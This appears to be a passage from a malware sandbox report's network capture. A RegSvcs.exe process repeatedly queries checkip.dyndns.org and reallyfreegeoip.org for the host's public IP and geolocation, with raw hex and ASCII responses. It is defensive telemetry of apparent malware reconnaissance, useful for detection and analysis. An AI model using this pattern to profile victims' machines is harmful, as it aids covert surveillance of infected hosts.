Jan 11, 2025 03:00:09.878768921 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:09 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 75c4c5892a63dfd501d87569df08c030 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49713	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:00:10.546164036 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:00:19.077785969 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 8c9f76726a2e147a9911092f43fd0818 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49761	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:00:19.726870060 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:00:26.014272928 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:25 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 76de77a3462ee1299c0e9f61b2e30dbf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49793	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:00:26.648175955 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:00:27.102828026 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 62026348e7a75c8c78a7905e92a498a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49800	193.122.130.0	80	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 03:00:27.714637995 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 03:00:28.439891100 CET	321	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 36e58ea3054fe0823db1f919ee527942 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:59:58 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 01:59:58 UTC	863	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:59:58 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875587 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iY%2Fj5I8ah3EzIhOPNh6bg%2BDDWTKFtLuNfNokuzVF5s1A47sYaQlMFCw0zp8e51hEOeC9CrNKDksV%2B6uDHU%2FFBQ%2BzOzN%2FGNXhkVsiRHudyZFO81a0vzBz7%2B9rtYavZhNgs4T9rWkZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90014f7f2a207d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2068&min_rtt=2040&rtt_var=785&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1431372&cwnd=244&unsent_bytes=0&cid=ae23dcad0bcc0472&ts=252&x=0"
2025-01-11 01:59:58 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49706	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 01:59:59 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 01:59:59 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 01:59:59 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875588 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B9FvckN0RzNzvC9pnVav%2B7Nq655Co7xiskPrwk2%2BQjjd9gqoJtHDRgwRvFwNDxLlI012KiaCyX15WLjB9q1cqL%2F0U8VDEjomtcVTp0EmLUo1wz8duM5p5ia%2FgGxLOkeeZ0f9YJG3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90014f8439107d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2021&min_rtt=2014&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1449851&cwnd=244&unsent_bytes=0&cid=81f21d85ac16d045&ts=155&x=0"
2025-01-11 01:59:59 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:00 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:00:00 UTC	853	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:00 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875589 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OfeNDxOT0ShD6PWINs3ONKpqZrdGGQCV%2Fq2zKazXDa7phFMtN3A2xLmQl2NPWcANzmJQGwhoDFQR3fsrGJeAc%2FDQC6mU8aCuFHfPKYjzs15qWxRP5MLujVX2XuV3IY1epeyNlr8x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90014f8b3b6cc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1640&min_rtt=1592&rtt_var=631&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1834170&cwnd=244&unsent_bytes=0&cid=93179aadf2fbe894&ts=164&x=0"
2025-01-11 02:00:00 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49710	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:05 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-11 02:00:05 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:05 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875594 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qbPZ7s0q%2FD2jgbgTA41yVoKoF2w0u86Au5CGLicN3javwyj4IQNzq%2B9SaaeMq2wQBX4cMdl0IPEoKc%2FPT%2FsboYWMCHMVn76sgbU5HHjjk%2FaN2aUbWaMkYR67IupmXSDXumOceJM%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90014fabad0cc443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1680&rtt_var=642&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1688837&cwnd=244&unsent_bytes=0&cid=1e88ef54c738a79d&ts=157&x=0"
2025-01-11 02:00:05 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49712	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:10 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:00:10 UTC	860	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875599 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eIX8EfxVhb%2FzbEnUVGa6CW40%2BgKK%2BiIfOZroIoQLuCy0KXebLCnrrIPo9WMJCeyT%2Bao1aMnR6j8uL0P6aWSSeq9uCsx4Mvc1NmZMXceI12mMZXziKha6Sd858UaftM6A%2F8CbqJNx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90014fc97b437d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2371&min_rtt=1963&rtt_var=1028&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1487519&cwnd=244&unsent_bytes=0&cid=3918b58f17c03d76&ts=159&x=0"
2025-01-11 02:00:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49755	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:19 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:00:19 UTC	859	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875608 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tNUsC%2FSDtVHfhmaiAx3H648eBPPj8XKPFhHw%2FU2mKw9AuphHhRsVDy24k6PNczOEbDDZMgw4JTbjeJcGSMUv9mvfiO%2BWIum%2FcxLGOLm4GI0T1x4im9F9JS9fWM1VmxcX9UgF0%2BhT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90015002c9d50f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1483&min_rtt=1473&rtt_var=574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1871794&cwnd=231&unsent_bytes=0&cid=ff9d3042f2a512b9&ts=161&x=0"
2025-01-11 02:00:19 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49791	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:26 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:00:26 UTC	857	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875615 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qwho2JUXjWvYQ54tpA464tEUXZhjFCA%2B02gxvenB9unr4GwwQDM1Ax%2BnXLjC%2BZOLSvew70HEJCZKC9WsUmGoNry8MZT0jvelmlYOyUHF8gkdHxIfUx6zo6D3ghXjS9H%2Bxhw0gKY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9001502e09308c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1979&min_rtt=1962&rtt_var=771&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1387173&cwnd=223&unsent_bytes=0&cid=247c7d2e39bb7de0&ts=161&x=0"
2025-01-11 02:00:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49799	104.21.80.1	443	4148	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 02:00:27 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-11 02:00:27 UTC	861	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 02:00:27 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1875616 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eKAO39eW4g%2F%2FJfrDV7z6T9GodyYCfXPy4Y5yTJpmveBhzbiwI3X2G4ChMCQ13i7FwI%2F15L1wxWow%2Bso9wJJpzBvWVohjVZFKBoVosBA%2FfQNR1ygcpl0Ukrr3QpVSLNmR%2BNCWPsEA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 90015034dae68c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1964&rtt_var=745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1459270&cwnd=223&unsent_bytes=0&cid=b5aec204f662956c&ts=146&x=0"
